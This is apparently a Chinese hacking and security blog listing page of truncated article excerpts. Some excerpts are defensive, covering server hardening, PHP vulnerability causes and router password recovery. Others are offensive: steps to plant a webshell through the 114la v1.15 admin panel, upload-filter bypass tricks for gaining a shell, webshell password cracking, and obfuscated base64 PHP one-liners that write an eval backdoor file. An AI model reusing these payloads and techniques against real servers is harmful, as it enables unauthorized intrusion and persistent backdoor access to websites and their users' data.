架设基于windows2003的安全Asp.net服务器
随着Microsoft Visual Studio 开发环境的普及,基于Asp .Net坏境的网站越来越多。因此Asp .net服务器的安全问题自然而然的成为了人们关心的问题。本文以Windows2003为例,架设一台安全的Asp .Net的服务器。 实验坏境: 操作系统:Microsoft Windows Server 2003 Enterprise Edition Service Pack 2...
mysql官方网站被黑并获得了ROOT权限
太牛X了,mysql都被强奸了,世界又开始混乱...... Amorize的安全研究人员最近表示,已经确认黑客入侵mysql.com,并通过iframe的方法 让用户感染了恶意代码,他们已经追踪到佛罗里达和瑞典两个恶意软件托管地,在当地时 间周一下午依然在对mysql.com的访客实施攻击,用户凭据可能已经遭到了窃取,因此 建议mysql.com注册过的用户修改自己与此相同的密码。 更糟的是研究发...
114啦网址导航v1.15后台拿shell
我测试的版本是V1.15 网上都是V1.13的 于是下载回来看了下 。 后台 点击模块管理--->分类模块-->添加模块 直接添加后缀为php或asp的 都可以 内容就是马的内容。 马地址 在admin\tpls\tpls\main\green\class目录下
PHP一句话变型
<?php @fputs(fopen(base64_decode(bG9zdC5waHA=),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==));?> <script language="php">@fputs(fopen(base64_decode(bG9zdC5waHA=),w),bas...
(转载)万能破解webshell密码
前一阵发表的自动循环机破解无返回错误的一句话,大家可能有很多疑虑,这次给大家显示一个彻底通杀的办法。 先来看看一款PHP shell,如图: 这款shell输入错误密码没有返回错误信息,在登录页面里找关键字也不可以爆破,难道真的没办法啦~下面就来演示下 先用抓包工具抓一下包,可以看到是post提交方式 把抓到的包填写到自动循环机里,并执行一下看下返回信息是不是200 设置上字典文件,这里我们把po...
渗透思路+技巧
上传漏洞拿shell: 1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx….之类的马,拿到shell. 2.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:*.asp ,*.asp..。 3.利用双重扩展名上传例如:*.jpg.asa格式(也可以配上第二点一起利用)。 4.gif文件头欺骗 5.同名重复上传也很OK。: 渗透过程中常用命令...
禁用指定DOS命令办法
这种方法的基本原理是将危险的DOS命令加以限制,防止非法使用这些命令对硬盘数据进行破坏。具体方法如下: 用“记事本”打开C盘根目录下的Autoexec文件,并在其中添加如下语句: C:\>DOSKEY FORMAT=Bad command or filename! C:\>DOSKEY del=Bad command or filename! C:\>DOSKEY...
(老文章)PHP程序漏洞产生的原因和防范方法
滥用include 1.漏洞原因: Include是编写PHP网站中最常用的函数,并且支持相对路径。有很多PHP脚本直接把某输入变量作为Include的参数,造成任意引用脚本、绝对路径泄露等漏洞。看以下代码: ... $includepage=$_GET["includepage"]; include($includepage); ... 很明显,我们只需要提交不同的Includepage变量就可...
交换机与路由器口令恢复
路由器口令恢复: 1、 在用户模式下输入show version,记下配置寄存器的原始值。如0X2102 2、 关闭路由器电源,利用console线将路由器和交换机相连,打开超级终端 3、 打开路由器电源,在60秒内按下Break键,使路由器进入ROMMON模式 4、 在rommon 1>下输入confreg 0x2142,从Flash引导,但不装载配置文件 5、 在rommon2>...
(老文章)浅析PHP程序中的目录遍历漏洞
深冬及夕 目录遍历漏洞在国内外有许多不同的叫法,比如也可以叫做信息泄露漏洞,非授权文件包含漏洞.名称虽然多,可他们却有一个共同的成因,就是在程序中没有过滤用户输入的../和./之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件,其危害可想而知.这类漏洞大家比较熟悉的可能就是在一些邮件列表程序以及网络硬盘程序中,其实这类漏洞还广泛存在与一些国外的BLOG程序中,这类漏洞大概分...